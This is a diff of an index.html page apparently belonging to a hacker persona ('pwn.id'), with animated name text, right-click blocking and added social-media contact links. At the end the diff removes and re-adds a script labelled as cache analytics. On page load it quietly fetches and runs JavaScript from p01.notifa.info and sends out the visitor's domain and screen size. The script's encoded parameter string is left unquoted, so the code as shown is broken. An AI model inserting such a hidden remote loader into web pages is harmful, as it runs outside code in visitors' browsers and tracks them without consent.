--- a/index.html
+++ b/index.html
@@ -274,6 +274,7 @@ span.green {
 <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
 <p><br /><p><br /><p><br /></p><br /></p><br /></p><br /><p>
 <br>
+
 <font size="20" face="iceberg"><center><script>
 farbbibliothek = new Array(); 
 farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 
@@ -341,15 +342,26 @@ text= "[ Muhamad Risman Aziz ]"; //h
 string2array(text);
 divserzeugen(); 
 //document.write(text); 
-</script></center></font></b>
+</script>
+
+</center></font>
+  <div class="terminal">
+        contact me?
+        <br/>
+        <a href="https://www.facebook.com/pwn.id">facebook</a> | <a href="https://instagram.com/mrismanaziz_">instagram</a>
+        <br/>
+        <br/>
+    </div></b>
 <font color="black" face="Iceland">
 <font size="1"><br>
 <font face="Iceland"><p >
+
 <script type="text/javascript">/*<![CDATA[*/
 new TypingText(document.getElementById("Risman"), 90, function(i){ var ar = new Array("_", " ", "_", " "); return " " +
 ar[i.length % ar.length]; });
 //Type out examples:
 TypingText.runAll();
 /*]]>*/</script>
-<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mSloTCX7Grkn4XBkosnnw0nbMldhOCvRsPOh0UceFmIpDSCWs%2bJud0SS20WKy4WlOn8bRcRz8kyexcR8xcG271mY69KH6%2bmlsQrk4AoYnzom9yLtgZA94oN8H7Hp%2f%2fI7LvJOblZ47KS5ttrUZAE7UFSKtDK9M3cvnXqglWUrUwNfERB34ONGXQBWp8kv991nvYxY9IT2E9xxmUBMep%2fWEwRBHGYV6vjuF2sCTx5oKb%2b%2b27JlvhPi66KjkG0WJUF1md4%2biCi%2fsFnYBve%2bNBvxb8t%2f6KPXSs2IGF54Ftkf8tkP1itF555IYYmgupIENBJpmi9sLYtJnFVPMjmuDxcyMHggRsskM018qHXaxstKiUEAHmVDUD5NJWRbVDfnLXY%2b9FMLaMsBcOGlCL40pzFfCa%2boFnpFVg0NetekJ7PNskcqxUUnj%2fiobCpBoUBWb0TenWwm3LcE2%2flsj6SfqZ4%2fDI95XSanTbKbqfXWZto%2b1JwGNo3wtMwjyAZp2DHMFVE3qmFhlaQNOEMZbm%2bBLtFJlQ4sj90ZHYtKNIHXdcgQR%2fwpRPYMWMJGsMw%3d%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
+<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mSloTCX7Grkn4XBkosnnw0nbMldhOCvRsPOh0UceFmIpDSCWs%2bJud0SS20WKy4WlOn8bRcRz8kyexcR8xcG271mY69KH6%2bmlsQrk4AoYnzom9yLtgZA94oN8H7Hp%2f%2fI7LvJOblZ47KS5ttrUZAE7UFSKtDK9M3cvnXqglWUrUwNfERB34ONGXQBWp8kv991nvYxY9IT2E9xxmUBMep%2fWEwRBHGYV6vjuF2sCTx5oKb%2b%2b27JlvhPi66KjkG0WJUF1md4%2biCi%2fsFnYBve%2bNBvxb8t%2f6KPXSs2IGF54Ftkf8tkP1itF555IYYmgupIENBJpmi9sLYtJnFVPMjmuDxcyMHggRsskM018qHXaxstKiUEAHmVDUD5NJWRbVDfnLXY%2b9FMLaMsBcOGlCL40pzFfCa%2boFnpFVg0NetekJ7PNskcqxUUnj%2fiobCpBoUBWb0TenWwm3LcE2%2flsj6SfqZ4%2fDI95XSanTbKbqfXWZto%2b1JwGNo3wtMwjyAZp2DHMFVE3qmFhlaQNOEMZbm%2bBLtFJlQ4sj90ZHYtKNIHXdcgQR%2fwpRPYMWMJGsMw%3d%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
+</body>
 </html>
